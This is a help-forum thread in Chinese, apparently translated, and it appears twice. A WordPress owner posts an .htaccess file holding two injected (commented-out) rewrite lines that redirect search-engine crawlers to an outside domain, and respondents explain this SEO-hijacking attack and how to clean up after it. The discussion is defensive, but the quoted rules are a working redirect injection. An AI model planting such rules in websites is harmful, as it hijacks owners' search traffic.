网站地图
Wordpress sitemap
这是我的 wordpress 网站的站点地图:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
#RewriteCond %{HTTP_USER_AGENT} (Googlebot|Bingbot|MSNbot|Webdup|AcoonBot|AhrefsBot|Ezooms|EdisterBot|EC2LinkFinder|jikespider|Purebot|MJ12bot|WangIDSpider|WBSearchBot|Wotbox|xbfMozilla|Yottaa|YandexBot|Jorgee|SWEBot|spbot|TurnitinBot-Agent|mail.RU|curl|perl|Python|Wget|Xenu|ZmEu) [NC]
#RewriteRule (.*) http://www.suffolklawreviewab.com/ [R=301,L]
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
RewriteRule ^sitemap_index\.xml$ /index.php?sitemap=1 [L]
RewriteRule ^([^/]+?)-sitemap([0-9]+)?\.xml$ /index.php?sitemap=&sitemap_n= [L]
</IfModule>
有人可以解释一下恶意软件是否写入了第 4 行和第 5 行?我已经预防性地评论了他们。
另一个问题:
最后两个重写规则是为索引站点地图而制定的?
谢谢
是的,第 4 行和第 5 行是恶意软件。这会将所有搜索引擎重定向到他们的站点,因此他们实际上是在窃取您的所有搜索引擎优化。最后两行本身不是恶意软件,但您应该检查站点地图并查看站点地图的内容。确保您进行了完整的主机扫描,因为某些文件正在将这些行插入到您的 htaccess 中。
您发布的不是站点地图,而是您的 htaccess 文件。
关于您的第一个问题,是的,这看起来确实像恶意软件攻击。这两行实质上是说,如果用户代理是 google、bing 等,则在第二行中重定向到 URL。这是一种劫持搜索引擎机器人的方式,以便让它们为自己的网站而不是您的网站编制索引。检测这种攻击可能很困难,因为对于普通用户来说一切看起来都很正常。
关于您的第二个问题,这些规则似乎是为了将站点地图请求映射回您的索引文件,因此您使用的任何站点地图插件都可以以编程方式提供站点地图,而不是将其存储在静态文件中 xml文件。鉴于您的网站已被入侵,我会验证这实际上是您的站点地图生成器的工作方式。
此外,仅仅评论这些行不足以解决您的恶意软件问题。很可能您网站的其他方面也受到了损害。我的建议是:
- 更改所有密码以防止进一步的攻击
- 使用 sucuri.net 等扫描服务来识别任何其他问题并监控未来的任何问题。
- 首先考虑您的网站是如何被感染的。您的计算机是否感染了恶意软件?您是否安全地存储了密码?其他有权访问您网站的人也是如此。
- 一旦您采取措施验证您的网站是干净的,请再次更改您的密码。
这是我的 wordpress 网站的站点地图:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
#RewriteCond %{HTTP_USER_AGENT} (Googlebot|Bingbot|MSNbot|Webdup|AcoonBot|AhrefsBot|Ezooms|EdisterBot|EC2LinkFinder|jikespider|Purebot|MJ12bot|WangIDSpider|WBSearchBot|Wotbox|xbfMozilla|Yottaa|YandexBot|Jorgee|SWEBot|spbot|TurnitinBot-Agent|mail.RU|curl|perl|Python|Wget|Xenu|ZmEu) [NC]
#RewriteRule (.*) http://www.suffolklawreviewab.com/ [R=301,L]
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
RewriteRule ^sitemap_index\.xml$ /index.php?sitemap=1 [L]
RewriteRule ^([^/]+?)-sitemap([0-9]+)?\.xml$ /index.php?sitemap=&sitemap_n= [L]
</IfModule>
有人可以解释一下恶意软件是否写入了第 4 行和第 5 行?我已经预防性地评论了他们。
另一个问题: 最后两个重写规则是为索引站点地图而制定的?
谢谢
是的,第 4 行和第 5 行是恶意软件。这会将所有搜索引擎重定向到他们的站点,因此他们实际上是在窃取您的所有搜索引擎优化。最后两行本身不是恶意软件,但您应该检查站点地图并查看站点地图的内容。确保您进行了完整的主机扫描,因为某些文件正在将这些行插入到您的 htaccess 中。
您发布的不是站点地图,而是您的 htaccess 文件。
关于您的第一个问题,是的,这看起来确实像恶意软件攻击。这两行实质上是说,如果用户代理是 google、bing 等,则在第二行中重定向到 URL。这是一种劫持搜索引擎机器人的方式,以便让它们为自己的网站而不是您的网站编制索引。检测这种攻击可能很困难,因为对于普通用户来说一切看起来都很正常。
关于您的第二个问题,这些规则似乎是为了将站点地图请求映射回您的索引文件,因此您使用的任何站点地图插件都可以以编程方式提供站点地图,而不是将其存储在静态文件中 xml文件。鉴于您的网站已被入侵,我会验证这实际上是您的站点地图生成器的工作方式。
此外,仅仅评论这些行不足以解决您的恶意软件问题。很可能您网站的其他方面也受到了损害。我的建议是:
- 更改所有密码以防止进一步的攻击
- 使用 sucuri.net 等扫描服务来识别任何其他问题并监控未来的任何问题。
- 首先考虑您的网站是如何被感染的。您的计算机是否感染了恶意软件?您是否安全地存储了密码?其他有权访问您网站的人也是如此。
- 一旦您采取措施验证您的网站是干净的,请再次更改您的密码。